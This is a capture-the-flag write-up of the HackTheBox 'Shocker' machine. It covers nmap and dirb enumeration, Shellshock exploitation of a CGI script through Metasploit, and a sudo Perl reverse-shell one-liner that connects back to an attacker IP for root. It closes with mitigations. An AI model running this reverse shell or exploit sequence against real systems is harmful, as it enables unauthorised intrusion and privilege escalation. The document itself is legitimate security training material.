HackTheBox 'Shocker' writeup
Getting Shells on Shocker
A Quick HackTheBox (HTB) writeup on ‘shocker’
Preface
Unfortunately, it looks like the first time I ran through this box, I got frustrated trying to get the exploit to work manually, so ended up being lazy and falling back on metasploit. I will go ahead and publish the writeup with my use of msf, but if I find my notes on how I did it manually, or run through it again, I will update this writeup.
| Host Information | ||
|---|---|---|
| Hostname | Operating System | HTB Difficulty Rating |
| Shocker | Linux | Easy |
enumeration
nmap
╰─➤ sudo nmap -sS -sV -O -oA shocker 10.10.10.56
[sudo] password for initinfosec:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-23 10:47 CST
Nmap scan report for 10.10.10.56
Host is up (0.044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/23%OT=80%CT=1%CU=31276%PV=Y%DS=2%DC=I%G=Y%TM=5E00EF
OS:D2%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M
OS:54DST11NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71
OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds
Based on the information provided by apache and ssh, and after some Googling on the versions provided by nmap, it’s likely that this system is Ubuntu Xenial.
further enumeration with dirb
Noticing port 80 is open, I run dirb against the site:
╰─➤ dirb http://10.10.10.56 -o shocker_dirb_results.txt 130 ↵
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: shocker_dirb_results.txt
START_TIME: Mon Dec 23 10:50:11 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)
-----------------
END_TIME: Mon Dec 23 10:53:52 2019
DOWNLOADED: 4612 - FOUND: 3
cgi-bin and server-status I did not have access to. index.html, as expected, is the home page. There’s just an image that says don’t bug me, with nothing hidden in the source, so appears to be a dead end.
Since cgi-bin often houses scripts that apache can pass off to other parts of the OS, i’ll run the script again, searching for extensions sh, pl, looking for script files on the OS that are tied to the URI:
dirb http://10.10.10.56/cgi-bin/ -X .sh,.pl -o dirb_cgi-bin.txt 130 ↵
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_cgi-bin.txt
START_TIME: Mon Dec 23 15:29:06 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.pl) | (.sh)(.pl) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:119)
-----------------
END_TIME: Mon Dec 23 15:36:19 2019
DOWNLOADED: 9224 - FOUND: 1
Viewing the one file, user.sh file that was found, we see the following:
cat user.sh
Content-Type: text/plain
Just an uptime test script
16:39:27 up 50 min, 0 users, load average: 0.00, 0.00, 0.00
exploitation of shellsock via metasploit
using the shellshock exploit in msf, I set the following:
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
I get a user shell:
meterpreter > shell
Process 11628 created.
Channel 1 created.
whoami
shelly
ls -ltr
total 4
-rwxr-xr-x 1 root root 113 Sep 22 2017 user.sh
running sudo -l I see that I have perl run as root with sudo nopasswd settings.
I will pass a perl command to try and spawn a reverse shell and try to gain a foothold in the system. (I grabbed this from pentestmonkey’s reverse shell cheat sheet):
sudo perl -e 'use Socket;$i="10.10.14.50";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
I start a listener on port 1234, and I catch the shell:
sudo nc -lvp 1234
Connection from 10.10.10.56:48374
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Awesome, the shellsock exploit gave us ‘one-shot’ root level access. From here we can grab both the user and root flags from their respective home directories.
Potential mitigations
- Patch the Linux server bash program so as not to be vulnerable to ShellShock
- If possible, narrow down the amount of information httpd and OpenSSH give out externally via banner grab (an excess of banner/version information makes it easier for an attacker to better tailor attacks)
- Avoid blanket sudo nopasswd privileges with perl - try to further refine the sudo privledges if possible.
That’s it for this box, thanks again, hope it was useful.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!